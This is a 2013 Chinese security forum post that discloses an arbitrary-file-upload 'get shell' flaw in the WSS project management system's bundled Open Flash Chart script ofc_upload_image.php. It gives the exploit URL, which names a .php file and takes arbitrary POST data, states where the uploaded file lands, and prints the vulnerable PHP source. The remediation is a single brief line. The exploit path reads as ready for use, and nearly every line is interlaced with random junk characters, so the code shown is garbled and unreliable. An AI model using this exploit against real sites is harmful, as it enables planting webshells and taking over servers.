找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2178|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存. p; z2 u2 _" [; i. Z/ q- l
漏洞文件/chart/php-ofc-library/ofc_upload_image.php7 u* P' I( D" O6 Q

) u. @! V* S" [$ S( M: x+ X  M利用:% V$ r7 P, w# w
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
% ]( S" w: P" s, f1 A& M
9 e7 z3 ~% |& R6 z$ gPost任意数据8 O7 Y- ^  j2 B4 G. E; k# R9 q& a" i
保存位置http://localhost/chart/tmp-upload-images/hfy.php
1 h# \) ?3 B) t! V- |, p; i* @* n  e
! t0 T3 N" `6 l& i. r
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~9 Q: L- j5 o0 W' N4 s

, v5 u3 m, Y6 H! L. M: R$ X<?php
. R, j$ m/ Y4 W9 C% V) I0 v9 ^# J/ P* c! t$ d" C
//
( E4 S/ c( |" p: o6 G  v// In Open Flash Chart -> save_image debug mode, you# h' \3 E' r2 m' B  A2 H4 O
// will see the 'echo' text in a new window.' y* ?. e0 r5 }* R, C5 {3 y9 K
//
& W0 g, {6 N* A6 H5 B% d
  N7 |7 W+ M/ a+ h/*
1 a/ j% T% k4 `% D. J0 e- t- h1 F4 N# Z
print_r( $_GET );
$ l; T  C0 V5 rprint_r( $_POST );
; N, q' a: O2 Z2 V/ i% R9 \print_r( $_FILES );
* n) [6 l0 f' C7 K% m) O# q& `; m' r# u0 J1 ~
print_r( $GLOBALS );
/ |4 \+ o' r' _+ g; Kprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );. Q7 P7 _4 u- P, ]

) C0 K: C0 T  R- J1 n5 G& c*// M) ^, P7 m1 e8 U- w
// default path for the image to be stored //
4 [% q$ R, E  P5 |  N; \+ _$default_path = '../tmp-upload-images/';
5 F) _6 d1 a7 n: B- B5 _7 J7 V8 s1 b- n* X: L
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
  E( N0 v/ j. D$ l9 B8 L0 W- y3 V. L, C2 w$ J# b, B) U( o0 F
// full path to the saved image including filename //4 E( v/ [' O  j4 l8 b( m& t" e1 i
$destination = $default_path . basename( $_GET[ 'name' ] );
  `/ {  O! S. A+ t* i' k! X2 u) N. q4 |
echo 'Saving your image to: '. $destination;# [/ \' z, |; H, L8 a. E
// print_r( $_POST );7 e+ c( A8 ?3 t7 c6 O
// print_r( $_SERVER );0 y9 t# u+ C+ P/ k
// echo $HTTP_RAW_POST_DATA;" \" U. Y' Y, }8 Q$ k

% R( n1 r6 x& F% D5 Y: V//3 m/ I( z1 d/ A' M) w8 Z7 u
// POST data is usually string data, but we are passing a RAW .png$ C: G1 j4 f: t. O) h
// so PHP is a bit confused and $_POST is empty. But it has saved
6 b9 \- N- @) _5 G// the raw bits into $HTTP_RAW_POST_DATA$ Y' B9 K- h$ q" H9 L
//
! l& W- Z, v  n" a( T- G+ I4 M4 M* u9 K# K% C7 @5 Y, g
$jfh = fopen($destination, 'w') or die("can't open file");" y8 t% o+ t0 d0 `' p4 M) ~& t
fwrite($jfh, $HTTP_RAW_POST_DATA);, a" a: q7 J' k3 p. e
fclose($jfh);
: R/ ?& O2 \) R% g" s" H
5 T8 j' F$ {9 W, `0 `2 P' _//
. F: Y5 I4 v) w# L0 k// LOOK:
/ M: y9 _- o2 k; t* L8 a% {//$ Y$ b  J2 d% K1 Q, I
exit();1 \. o* H: w3 w/ e& m( \
//, b; a5 M; u0 b! Y1 o) k
// PHP5:, H1 T; |9 E% S
//, n' M  V8 g. v6 @$ [
6 K+ `4 F& R* S+ I

! U- `' y2 {& o( u9 b( u) W( ?" |( ^& \// default path for the image to be stored //
/ L' I, y0 x# y7 D( T# u$default_path = 'tmp-upload-images/';7 b, q2 G7 ~% q# I0 W' o7 m2 e

" {$ E( Z; U4 t! a/ M  pif (!file_exists($default_path)) mkdir($default_path, 0777, true);% C; w* c1 x) f
0 |7 G+ G$ {+ K- ^0 g0 _1 g1 Y
// full path to the saved image including filename //6 u$ @0 f+ a' ]; C5 H0 W; p
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
8 Z9 l, k/ x7 N( e4 L: n6 m2 X7 B9 `# x! O. ]
// move the image into the specified directory //
+ l& k+ A3 A7 M# wif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {( S/ p, I% {* A3 A# V
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";0 {7 g: F9 h, l; ], C
} else {
1 @, L/ y1 D  a0 e; H/ c9 O    echo "FILE UPLOAD FAILED";% h( h' k- [0 q$ u2 c) e
}' ~, e* b! W/ d& V) R! J
+ \6 h, o9 R8 S% ]$ N' w

. t7 @. i7 Z7 a: O, `0 a?>
8 S1 r: |2 n3 A% E' o5 g# T5 v
) @2 W& w% H  w7 N* P: ~; g) I$ ]" M+ U& k5 T4 |2 S* Y' V: o
5 g) q2 e7 p! H2 `5 L
* S, s# _* n$ ?6 N' ?  f1 m5 Q

  o9 |7 Z# z8 _5 G! ~5 @+ I' F; K; r  |" ?7 t; m
修复方案: 4 g1 O) M7 d# t8 _/ P4 k% y2 O
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 / G1 C8 L, o4 y% h
/ p, o' q4 D2 X  x" z" J
* \' r  ^+ l" r% _) Q2 _2 X

* i' h/ K! e' Y0 M" F
5 R5 Y. Q6 K' L; \

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表